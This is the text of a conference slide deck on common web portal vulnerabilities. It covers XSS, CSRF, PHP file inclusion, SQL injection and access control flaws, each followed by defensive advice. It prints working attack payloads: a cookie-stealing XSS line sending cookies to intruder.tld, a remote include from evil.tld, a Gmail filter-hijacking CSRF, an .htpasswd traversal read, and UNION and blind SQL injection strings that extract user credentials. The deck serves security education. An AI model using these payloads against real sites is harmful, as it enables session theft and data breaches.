Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Minor Mistakes in Web
       Portals
      A Real Case Study ;-)


 Borys Łącki
 Michał Sobiegraj, CISSP



    Why is Web
    important?
M


    Web is everywhere




M




     We spend money
     We manage our finances
     We earn money
     We waste our time

M

                     Internecie traffic




http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf
M





           2007:
    Web traffic has finally
      overtaken P2P


M

    Web has beaten pr0n! YAY!*




           * not supported by any research
M

                HTTP traffic breakdown




http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf
M

    Number of Internet hosts increases

         Over 60 mln active hosts
                  (netcraft)




M



    Web security in a
       nutshell

M



    Web vulnerabilities make up
    nearly half of all discovered
      vulnerabilities in 2007
                (Sans)...


               Why?
     A really popular medium ($)
     Immature technology
     Logical errors
     Home-made so...


    Phishing victims in the US


    3.6 million of people lost
        $3.2 billion total
       (Gartner, http://www....

    Standard Web application architecture

                       Internet




                     WWW layer

         ...

                                    Wrong!

                      Internet




       WWW layer

      (I/O filters)
   ...
Application Firewall vs. Proper                            
     architecture, coding and SDLC
                         I...

                            The right approach

                     Internet




             Web Application Firewall
...


    Most popular attacks
     PHP Remote File Include
     SQL Injection
     Cross-Site Scripting
     Cross-site ...



    Information
     disclosure

B





    A funny story ;-)



B





    More pics hmm…
B





B





    :-D
B



    Downloaded…




B




    Connecting…




B





    PWND ;-)
B

    Conclusion?

            Staying
    secure requires specific
            mindset
            (Paranoia? ;-)
B


                             Client side
                           access control


     It’s possible to bypass the ...

    Client side access control
        RSS feed name based on user ID
        server.tld/rss/100_rss.xml
        server...




        Solution:

     Server side
    access control

B


    Cross-Site
    Scripting
      (XSS)
B

                                                         Reflective XSS
      Server
                       http://serve...


        Example XSS code
    document.write(‘
        <img src=„
           http://intruder.tld/cookiemonster.gif?
    ...

    Content alteration through
          an XSS attack




B

                 Rebranding through XSS
    http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117...

                This is how it looks in
                 the webpage code
    ...
    <div id=quot;maincontentquot;>
   ...

       The code that is to be changed


    <div id=quot;logoquot;>
          <div class=quot;logolinkquot;>
          <...

    The code in a Web browser




M

    Final outcome




M

    Rendered in a browser




M

         Content change using XSS

     Is not permanent
     Better code  easier (sic!)

    An idea:
    A form tha...

     Authentication using cookies
             POST /login.php HTTP/1.1
             login=user&password=asd12ed]r3

   ...

    Impersonating a legitimate user
             POST /login.php HTTP/1.1
             login=user&password=asd12ed]r3

 ...

                Session cookie hijacking

    http://www.server.tld/index.php?p=comm
    ents&comments_login=smietanka%3...





M





M





M

        How to send yourself a cookie?
               XMLHttpRequest
                Troublesome across domains
       ...

            What can we do?

     Tie a session ID with an IP address
     Require re-authentication
     Filter or s...

               http://server.tld/topics/<img
        src=http://www.serv.tld/images/smiley.gif>




    /
M
http://server.tld/topics/<img            
    src=http:%2f%2fwww.serv.tld%2fimages%2fsmiley.gif>




    %2f  /
M
http://server.tld/topics/<img        
    src=http:%252f%252fwww.serv.tld%252fimages%252fsmile
                          ...





B

                                                                Stored XSS
        Server
                              ...

          Stored XSS Exploitation?
     Permanent content alteration
     Easy session ID hijack
     CSRF
     XSS ...




    Session ID hijack




B

                                                            XSS Worm
     Web Server
                       Stores the X...

                                                              XSS Worm
     Web Server
                         Stores t...

                                                             XSS Worm
     Web Server
                              Zapi...

              Nduja – A Cross Domain/Webmail XSS Worm


    Intruder
                     E-mail                E-mail  ...

             What can we do?
     Tie a session ID with an IP address
     Require re-authentication
     Filter or s...


       Cross-Site
    Request Forgery
         (CSRF)
B

                                                                           CSRF
      Server
                           ...

    Useful in getting to know your
       users a wee bit better…




          <img src=”http://nasza-
          klasa....

    Gmail message interception (CSRF)

http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multip
art/form-data&_a...

                 What can we do?
     POST instead of GET
       not very bullet-proof: iframe, javascript
     Refer...




    PHP File Include

B

                    Local file include
 Local file snoop (configs)
 Arbitrary code execution
    (If file upload to th...

                   Remote file include
                            (Arbitrary code execution)

    <?php
    include($mo...

              What can we do?
     Harden the application server (e.g. in PHP.ini)
       allow_url_fopen = Off
       ...




    SQL Injection

M

                                                               SQL Injection
        Server
                            ...
POST http://www.server.tld/index.php?p=priv HTTP/1.1
                                                              
    p...
priv_search=&cat=1&w_city=Ca%B3a+Polska' and
                                                   
    1=1#&submit=Szukaj

...

    priv_search=&cat=1&w_city=Ca%B3a+Polska' and
    1=0#&submit=Szukaj




M

       priv_search=&cat=1&w_city=Ca%B3a+Polska'
       union all select @@version#&submit=Szukaj




    The used SELECT...

    priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select
    1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&s...

    priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select
    1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&s...
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select   
    1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_
  ...
priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select
                                                                ...

    Some S E C R E T S slip out ;-)


          14831 users
       already registered
         (yeah, right ;-)




M
Another discovery:
                               
    There is 1836 bots :-)




M

    Blind SQL Injection




                 Registration form:


B
                         ‘

            Blind SQL Injection
                    (experimenting)

     1' and 1='0
           OK
     1' or 1='1
 ...





    Products 1-8 of 8




B





    Product database for
     selected category is
            empty




B

               Blind SQL Injection

    • /zgoda.php?id=155765%20AND%20(select%2
      0ascii(substring((select%20login%...

    Results of a successful blind
       SQL Injection attack


     Delay
     Different content
     Error message

B

           What can we do?

     Filter and sanitise input data
     - Characters white-listing
     - Consistency (IDS...




    Conclusion

M

         Web application security is bad




    Vulnerability-causing mistakes are
              everywhere*


        ...

               What to do?

     Be sure to properly sanitise data
    coming from and being sent to the
               ...

      Be aware of potential threats


     Listenand ask
     Use professional assistance
     Perform a cost-benefit...

              Use proven solutions

    • Traditional coding errors got answered by
      managed code, automatic typing...

                       Hardening

                Proper configuration
                     is a key!

    One applicati...


           Think!
    No technical control will
    protect you from logical
             errors

M
michal@sobiegraj.com
  b.lacki@logicaltrust.net



Questions?
Upcoming SlideShare
Loading in …5
×

Minor Mistakes In Web Portals

5,507 views

Published on

Michal Sobiegraj and Borys Lacki

Published in: Business
  • Be the first to like this

Minor Mistakes In Web Portals

  1. 1. Minor Mistakes in Web Portals A Real Case Study ;-) Borys Łącki Michał Sobiegraj, CISSP
  2. 2.  Why is Web important? M
  3. 3.  Web is everywhere M
  4. 4.   We spend money  We manage our finances  We earn money  We waste our time M
  5. 5.  Internecie traffic http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  6. 6.  2007: Web traffic has finally overtaken P2P M
  7. 7.  Web has beaten pr0n! YAY!* * not supported by any research M
  8. 8.  HTTP traffic breakdown http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  9. 9.  Number of Internet hosts increases Over 60 mln active hosts (netcraft) M
  10. 10.  Web security in a nutshell M
  11. 11.  Web vulnerabilities make up nearly half of all discovered vulnerabilities in 2007 (Sans) M
  12. 12.  Why?  A really popular medium ($)  Immature technology  Logical errors  Home-made solutions M
  13. 13.  Phishing victims in the US 3.6 million of people lost $3.2 billion total (Gartner, http://www.heise-online.pl/news/item/2356/) M
  14. 14.  Standard Web application architecture Internet WWW layer (I/O filters) Application layer (business logic) Database server M
  15. 15.  Wrong! Internet WWW layer (I/O filters) New functionality Application layer (business logic) Database server M
  16. 16. Application Firewall vs. Proper  architecture, coding and SDLC Internet Web Application Firewall Warstwa WWW (filtry wejścia/wyjścia) New functionality Application layer (business logic) Database server M
  17. 17.  The right approach Internet Web Application Firewall WWW layer (I/O filters) Application layer New functionality (business logic) Database server M
  18. 18.  Most popular attacks  PHP Remote File Include  SQL Injection  Cross-Site Scripting  Cross-site Request Forgery (SANS Top-20 2007 Security Risks, 2007 Annual Update) M
  19. 19.  Information disclosure B
  20. 20.  A funny story ;-) B
  21. 21.  More pics hmm… B
  22. 22.  B
  23. 23.  :-D B
  24. 24.  Downloaded… B
  25. 25.  Connecting… B
  26. 26.  PWND ;-) B
  27. 27.  Conclusion? Staying secure requires specific mindset (Paranoia? ;-) B
  28. 28.  Client side access control  It’s possible to bypass the interface  Unlike in ATMs Does not work! B
  29. 29.  Client side access control  RSS feed name based on user ID server.tld/rss/100_rss.xml server.tld/rss/101_rss.xml server.tld/rss/102_rss.xml  Reading other user’s messages server.tld/index.php?p=ok&action=msgs2&msgs_id=80 server.tld/index.php?p=ok&action=msgs2&msgs_id=81 server.tld/index.php?p=ok&action=msgs2&msgs_id=82 B
  30. 30.  Solution: Server side access control B
  31. 31.  Cross-Site Scripting (XSS) B
  32. 32.  Reflective XSS Server http://server/index.php?id=<script>…</script> GET /index.php? id=<script>…</script> HTTP/1.1 Web Intruder Application User …<script>…</script>… exec(…) Data available in the context of the User B
  33. 33.  Example XSS code document.write(‘ <img src=„ http://intruder.tld/cookiemonster.gif? ’+escape(document.cookie) +’ ”> ’); B
  34. 34.  Content alteration through an XSS attack B
  35. 35.  Rebranding through XSS http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117, 109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40, 34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,10 9,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,1 11,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,1 05,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E document.getElementById(quot;logoquot;).innerHTML= quot;<img src='http://www.srv.tld/images/smiley.gif'>quot; M
  36. 36.  This is how it looks in the webpage code ... <div id=quot;maincontentquot;> <h2>Results for: <span style=quot;color: #f00;quot;><script>eval(String.fromCharCode(100,111,99,117,109,101 ,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,1 00,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77 ,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,5 8,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,1 12,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,4 6,103,105,102,39,62,34));</script></span></h2> </div> ... M
  37. 37.  The code that is to be changed <div id=quot;logoquot;> <div class=quot;logolinkquot;> <a href=quot;http://server.tld/quot;>server.tld</a> </div> ... </div> M
  38. 38.  The code in a Web browser M
  39. 39.  Final outcome M
  40. 40.  Rendered in a browser M
  41. 41.  Content change using XSS  Is not permanent  Better code  easier (sic!) An idea: A form that looks just like a legitimate one, but sends input data elsewhere  phishing B
  42. 42.  Authentication using cookies POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user B
  43. 43.  Impersonating a legitimate user POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Intruder Welcome user B
  44. 44.  Session cookie hijacking http://www.server.tld/index.php?p=comm ents&comments_login=smietanka%3Cscri pt%3Edocument.write(document.cookie) %3C/script%3E PHPSESSID=gji9h519llgbgbnaqg7si0q1l0; __utma=258102041.949163972.1198624259.1198624259.1198624259.1; __utmb=258102041; __utmc=258102041; __utmz=258102041.1198624259.1.1.utmccn=(direct)|utmcsr=(direct)|utmc md=(none) M
  45. 45.  M
  46. 46.  M
  47. 47.  M
  48. 48.  How to send yourself a cookie?  XMLHttpRequest Troublesome across domains  Link img, iframe, location.href, etc. Przykład: <img src=quot;http://server.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7 si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259. 1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D25810204 1%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29 %7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29quot;> B
  49. 49.  What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (....//  ../), UTF-7 B
  50. 50.  http://server.tld/topics/<img src=http://www.serv.tld/images/smiley.gif> / M
  51. 51. http://server.tld/topics/<img  src=http:%2f%2fwww.serv.tld%2fimages%2fsmiley.gif> %2f  / M
  52. 52. http://server.tld/topics/<img  src=http:%252f%252fwww.serv.tld%252fimages%252fsmile y.gif> %252f  %2f  / M
  53. 53.  B
  54. 54.  Stored XSS Server POST /register.php HTTP/1.1 login=<script>…</script>&password=asd Web Application GET /index.php HTTP/1.1 <script>…</script> User …<script>…</script>… Intruder exec(…) Database Data available in the context of the User B
  55. 55.  Stored XSS Exploitation?  Permanent content alteration  Easy session ID hijack  CSRF  XSS Proxy  Automated worms - mySpace, Orkut, Nduja, Borys Easy ;] in web portals that allow users to publish their own content: - bidding portals, blogs, web fora, etc B
  56. 56.  Session ID hijack B
  57. 57.  XSS Worm Web Server Stores the XSS-worm code in their profile Intruder XSS … Intruder User_1 User_2 B
  58. 58.  XSS Worm Web Server Stores the XSS-worm code in their profile GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… … exec(…) Stores the XSS-worm code in their profile Intruder User_1 XSS User_2 B
  59. 59.  XSS Worm Web Server Zapisuje XSS w swoim profilu GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… User_2 … Stores the XSS-worm exec(…) code in their profile Intruder GET /user1/ HTTP/1.1 User_1 XSS …<script>…</script>… Stores the XSS-worm exec(…) User_2 XSS code in their profile B
  60. 60.  Nduja – A Cross Domain/Webmail XSS Worm Intruder E-mail E-mail E-mail E-mail Web Web Web Web Server Server Server Server WebMail WebMail WebMail WebMail Libero.it Tiscali.it Lycos.it Excite.com B
  61. 61.  What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (.. ..//  ../), UTF-7  Filter or sanitise data stored in and read from a database B
  62. 62.  Cross-Site Request Forgery (CSRF) B
  63. 63.  CSRF Server http://server.tld/delete.php?id=34 Web Application GET /delete.php?id=34 HTTP/1.1 Cookie: user_id=734223s8uod42 … id = 34; Intruder delete(id); User … Item deleted! M
  64. 64.  Useful in getting to know your users a wee bit better… <img src=”http://nasza- klasa.pl/invite/1?i=1”> (/var/log/apache/fbi_cia_what-not_access.log) B
  65. 65.  Gmail message interception (CSRF) http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multip art/form-data&_action=https%3A//mail.google.com/mail/h/ wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@maili nator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_atta ch=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter Everyone (well almost) has a Gmail account! (Domain hijack: www.davidairey.co.uk) B
  66. 66.  What can we do?  POST instead of GET  not very bullet-proof: iframe, javascript  Referrer  not very bullet-proof either: proxy, browsers, header alteration  Additional temporary ID  User ID tied to a long unpredictable key  ID-key association held on the server side  Re-authentication before sensitive operations  An vulnerability-free code!!! B
  67. 67.  PHP File Include B
  68. 68.  Local file include  Local file snoop (configs)  Arbitrary code execution (If file upload to the server is permitted)  Access to source code <?php if(file_exists(quot;includes/$page.incquot;)) { include quot;includes/$page.incquot;; } else { echo quot;In construction!<BR>quot;; } http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/publi c_html/.htpasswd%00 B
  69. 69.  Remote file include (Arbitrary code execution) <?php include($mosConfig_absolute_path.quot;/administrator/components /com_hashcash/config.hashcash.phpquot;); require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoS trategy.php'); http://server.tld/components/com_hashcash/server.php?mosConfig_a bsolute_path=http://evil.tld/evil.txt? access_log:62.48.xxx.xx - - [06/Jan/2008:07:11:06 +0100] quot;GET //install/index.php?G_PATH=http://www.js2023.pl//modules/PNphpBB2/images/.bash/pr.t xt? HTTP/1.1quot; 404 1021 quot;-quot; quot;libwww-perl/5.803„ access_log:168.212.xxx.xxx - - [06/Jan/2008:22:57:53 +0100] quot;GET /files/strawberry/plugins/wacko/highlight/html.php?text=http://www.nakedarena.com/i d.txt? HTTP/1.1quot; 404 1021 quot;-quot; quot;libwww-perl/5.76quot; B
  70. 70.  What can we do?  Harden the application server (e.g. in PHP.ini) allow_url_fopen = Off allow_url_include = Off register_global = Off safe_mode = On register_globals = Off safe_mode_gid = Off display_errors = Off log_errors = On error_log = /var/log/httpd/php_error.log disable_functions = system, shell_exec, exec, passthru  Watch out for some special characters (null byte, etc)  Filter and sanitise (../, UTF, etc)  WAFs: mod_security, Suhosin PHP B
  71. 71.  SQL Injection M
  72. 72.  SQL Injection Server GET /login.php HTTP/1.1 login=admin&password=1’ or 1=‘1 Web Application Intruder select * from users where login=‘admin’ and pass=‘1’ or 1=‘1’ Welcome admin! $dane = db_exec(„select from users where Database login=‘$login’ and pass=‘$pass’”) if ($dane.count) { print („Welcome $login”) … } else { print („Bye”); exit (0); } M
  73. 73. POST http://www.server.tld/index.php?p=priv HTTP/1.1  priv_search=2e332424&cat='quot;1&w_city=quot;'asd&submit=Szukaj M
  74. 74. priv_search=&cat=1&w_city=Ca%B3a+Polska' and  1=1#&submit=Szukaj M
  75. 75.  priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=0#&submit=Szukaj M
  76. 76.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select @@version#&submit=Szukaj The used SELECT statements have a different number of columns M
  77. 77.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submi t=Szukaj M
  78. 78.  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submi t=Szukaj M
  79. 79. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_ NAME,14,15,16,17,18 from information_schema.columns where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA != 'information_schema'#&submit=Szukaj M
  80. 80. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,login,5,6,7,8,9,10,pass,12,sex,14,15,16,17,18 from users#&submit=Szukaj M
  81. 81.  Some S E C R E T S slip out ;-) 14831 users already registered (yeah, right ;-) M
  82. 82. Another discovery:  There is 1836 bots :-) M
  83. 83.  Blind SQL Injection Registration form: B ‘
  84. 84.  Blind SQL Injection (experimenting)  1' and 1='0  OK  1' or 1='1  This email is already registered. You need to pick another one  1' union all SELECT IF( user() like '%sig%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  delay  user() == sig@...  1' union all SELECT IF( user() like '%asd%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  no delay B
  85. 85.  Products 1-8 of 8 B
  86. 86.  Product database for selected category is empty B
  87. 87.  Blind SQL Injection • /zgoda.php?id=155765%20AND%20(select%2 0ascii(substring((select%20login%20from%20a dmini%20limit%201,1),1,1)))%3D97 • id=155765 AND (select ascii(substring((select login from admini limit LINIA,1), MIEJSCE, 1))) =ZNAK_ASCII B
  88. 88.  Results of a successful blind SQL Injection attack  Delay  Different content  Error message B
  89. 89.  What can we do?  Filter and sanitise input data - Characters white-listing - Consistency (IDS, Firewall, Application, Database)  Do not trust user-side filters (selection lists, JavaScript, etc) M
  90. 90.  Conclusion M
  91. 91.  Web application security is bad Vulnerability-causing mistakes are everywhere* *well, almost everywhere ;-) M
  92. 92.  What to do? Be sure to properly sanitise data coming from and being sent to the user  Web Application Firewall (WAF)  IDS White-listing! M
  93. 93.  Be aware of potential threats  Listenand ask  Use professional assistance  Perform a cost-benefit analysis every piece of feedback is worth listening M
  94. 94.  Use proven solutions • Traditional coding errors got answered by managed code, automatic typing, GC, etc. • Web frameworks help maintain code quality in Web Applications – Assure code quality to some degree – We are not 100% safe » Frameworks are not mature enough » Not everyone knows how to use them properly » Sometimes expanded in a dumb way » Wide exploitation due to mass usage M
  95. 95.  Hardening Proper configuration is a key! One application server configuration directive may prevent a vulnerability from being exploited PHP: http://www.sans.org/top20/#s1 M
  96. 96.  Think! No technical control will protect you from logical errors M
  97. 97. michal@sobiegraj.com b.lacki@logicaltrust.net Questions?

×